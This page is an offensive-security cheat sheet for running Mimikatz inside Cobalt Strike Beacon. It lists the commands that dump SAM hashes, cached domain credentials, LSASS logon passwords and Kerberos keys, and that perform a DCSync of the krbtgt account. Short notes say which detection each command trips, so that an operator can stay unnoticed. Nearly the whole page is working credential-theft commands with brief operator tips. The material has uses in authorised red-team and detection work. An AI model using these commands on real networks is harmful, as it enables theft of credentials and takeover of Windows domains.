MimiKatz

Cobalt Strike + MimiKatz

Cobalt Strike's built in Mimikatz executes each new mimikatz command in a new temporary process, which is then destroyed after it finishes. Because of this, we will need to chain our mimikatz commands.

beacon> mimikatz token::elevate ; lsadump::sam

Modifier Keys

!

In most cases, ! is a direct replacement for token::elevate. For example:

beacon> mimikatz !lsadump::sam

@

The @ impersonates Beacon's thread token before running the given command, which is useful in cases where Mimikatz needs to interact with a remote system, such as with dcsync.

beacon> mimikatz @lsadump::dcsync /user:DEV\krbtgt

Dumping Security Account Manager (SAM)

beacon> mimikatz !lsadump::sam

Note: This opens a handle to the SAM registry Hive. "Suspicious SAM Hive Handle".

Dumping Cached Domain Credentials (DCC)

beacon> mimikatz !lsadump::cache

We can crack the hashes with hashcat. Example hashes can be found here.

Note: This handle to the SECURITY registry hive. Use the "Suspicious SECURITY Hive Handle".

Dumping NTLM Hashes

beacon> mimikatz !sekurlsa::logonpasswords

Note: Mimikatz's logonpasswords module will open a read handle to LSASS, which is logged under the winevent 4656. "Suspicious Handle to LSASS". Use this cautiously, and only if needed.

Dumping Kerberos Encryption Keys

beacon> mimikatz !sekurlsa::ekeys

Note: This module also opens a read handle to LSASS.

Last updated